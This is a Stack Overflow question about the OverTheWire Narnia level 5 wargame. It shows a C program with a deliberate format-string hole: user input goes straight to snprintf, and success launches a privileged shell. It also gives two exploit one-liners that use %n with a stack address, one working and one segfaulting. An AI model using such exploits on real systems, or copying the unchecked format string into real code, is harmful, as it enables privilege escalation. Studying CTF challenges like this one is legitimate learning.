0
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char **argv){
    int i = 1;
    char buffer[64];

    snprintf(buffer, sizeof buffer, argv[1]);
    buffer[sizeof (buffer) - 1] = 0;
    printf("Change i's value from 1 -> 500. ");

    if(i==500){
        printf("GOOD\n");
        setreuid(geteuid(),geteuid());
        system("/bin/sh");
    }

    printf("No way...let me give you a hint!\n");
    printf("buffer : [%s] (%d)\n", buffer, strlen(buffer));
    printf ("i = %d (%p)\n", i, &i);
    return 0;
}

Hi! I'm working on ctf exercise(Overthewire 5 level, Narnia). Here is the code that I've tried, but I don't understand why second option isn't working.

This one works

 ./narnia5 $(python -c 'print "\xe0\xd6\xff\xff" + "%496x%1$n"')

With this I get SegFault

./narnia5 $(python -c 'print "\xe0\xd6\xff\xff" + "%496x%n"')

The principle is the same in both variants, you pass the address and %n specifier reads amount of bytes passed, because address takes 4 bytes we add 496 bytes with padding. In both of them %n will read next address on the stack, as I understand. Thanks, for your answers.

Lundin
  • 195,001
  • 40
  • 254
  • 396
Bestofallnicks
  • 21
  • Welcome to SO. You should not assume that anyone knows what this means: "ctf exercise(Overthewire 5 level, Narnia)". You need to describe what you want to achieve. – Gerhardh Dec 05 '20 at 13:42
  • 2
    @Gerhardh The question is tagged with ctf and cybersecurity, *and* the question describes it's about a format string vulnerability. People asking a question about OpenGL do not need to explain what OpenGL is if they tagged the question appropriately. So I disagree with your comment. People in this field of work know exactly what OP means. – Cheatah Dec 05 '20 at 14:27

0 Answers0